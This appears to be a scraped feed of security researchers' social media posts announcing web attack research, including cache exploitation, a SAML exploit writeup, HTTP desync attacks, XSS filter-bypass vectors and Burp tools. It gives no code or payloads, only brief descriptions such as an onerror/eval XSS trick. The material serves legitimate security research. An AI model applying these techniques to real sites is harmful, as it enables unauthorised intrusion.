“Gotta Cache Em All: Bending the rules of web cache exploitation” En los últimos años, los ataques a la caché web se han vuelto comunes para robar datos, modificar sitios y entregar exploits, además de exponer vulnerabilidades críticas como SSRF y HTTP Request Smuggling. En la

You might have noticed that the recent SAML writeups omit some crucial details. In "SAML roulette: the hacker always wins", we share everything you need to know for a complete unauthenticated exploit on ruby-saml, using GitLab as a case-study. portswigger.net/research/saml-…

🤯🤯🤯

Speed up your Bug Bounty & Pentest reporting! I've built a Custom Action to instantly capture & annotate screenshots without leaving Burp. Download it from our GitHub or import directly into your Bambda! github.com/PortSwigger/ba…

Shoutout to Martin Doyhenard for the research! All this and more is in his @portswigger blog👇 portswigger.net/research/gotta…

I've just updated my "Screenshot" custom action with new features and hotkeys (thanks El Mago (backup)) To install it you can use Extensibility Helper, a new Burp extension that lets you import Bambdas directly from our GitHub repository with a single click! Go and get it!

Take Burp a step further and provide even more functionality than before with Custom Actions. Use Martin Doyhenard's new Bambda to take screenshots in Burp. You can also highlight and draw on your image to draw attention to specific areas. Check it out 👉 github.com/PortSwigger/ba…

I'm thrilled to announce "HTTP/1 Must Die! The Desync Endgame", at #BHUSA! This is going to be epic, check out the abstract for a teaser ↓↓↓

Thrilled to announce that I'll be presenting at #BlackHat USA 2025 Arsenal! Introducing HTTP Raider: a Burp Suite extension designed for deep HTTP protocol analysis and exploitation. Dive into stream-based HTTP vulnerabilities like never before. See you in Vegas!

Thrilled to finally release my latest research "The Single-Packet Shovel: Digging for Desync-Powered Request Tunnelling". Desync vulnerabilities stemming from HP2 downgrading continue to plague even the largest vendors, have a read to find out more! assured.se/posts/the-sing…

“I kind of thought SQLi was a thing of the past” — Justin Gardner Turns out it’s alive and well. Still shows up at live hacking events. Sometimes deep. Sometimes not even that deep. Just waiting. Full talk → youtu.be/PXqlHAoF2wc #BugBounty #DEFCON #BBV #AppSec #WebSecurity

Firefox now opens the door to URL-based XSS payload smuggling too. Yep, even more ways to sneak past filters using the window name and clever URL tricks. Link to vectors👇

This vector adds an onerror handler with eval, rewrites all ReferenceError names, then triggers an error to execute the payload. Just added it to the XSS cheat sheet. Credit to 0x999 🇮🇱, inspired by terjanq. Link to vector👇

I wanted to learn web sockets. So I built a hacking rooms! You can now connect multiple browsers and use HackPad to test HTML. You'll get a message with every browser connected. It even goes red when you call alert() from a different browser :D hackvertor.co.uk/hack-pad/hacki…

👻This is GerriScary: a vulnerability I discovered in Google's Gerrit that allowed to hack several projects and affected 18 Google projects including ChromiumOS (CVE-2025-1568), Chromium, Bazel, and Dart. Dive into the full details here: tenable.com/blog/gerriscar…

I'm thrilled to share that I will be presenting a 90 minute workshop in DEFCON's Bug Bounty Village! I will be speaking about advanced HTTP Desynchronisation attacks, and introducing a new tool to exploit complex vulnerabilities found in top bounty programs!

Thrilled to announce: I’ll be presenting a major new version of WebSocket Turbo Intruder at Black Hat Arsenal 2025! This open-source toolkit makes high-speed, advanced WebSocket attacks practical and painless.

Now that our CTF is announced, we’re excited to welcome PortSwigger as our CTF Triage partner of the Bug Bounty Village CTF at DEF CON 33! Their support helps us build a space where hackers can connect, learn, and push boundaries. #BugBounty #DEFCON #BBV #BugBountyVillage

Don't miss "Surfing through the Stream: Advanced HTTP Desync exploitation in the wild" by Martin Doyhenard (Martin Doyhenard) on Saturday, August 9 at 01:00 PM inside the Village. Read more at bugbountydefcon.com/agenda #BugBounty #DEFCON33

Today at #BlackHatUSA - three major new releases from PortSwigger Research 1pm - 'HTTP Hacker' at Black Hat Arsenal with Martin Doyhenard 1pm - 'WebSocket Turbo Intruder' at Black Hat Arsenal with d4d 3.20m - 'HTTP/1.1 Must Die! The Desync Endgame' at Black Hat USA with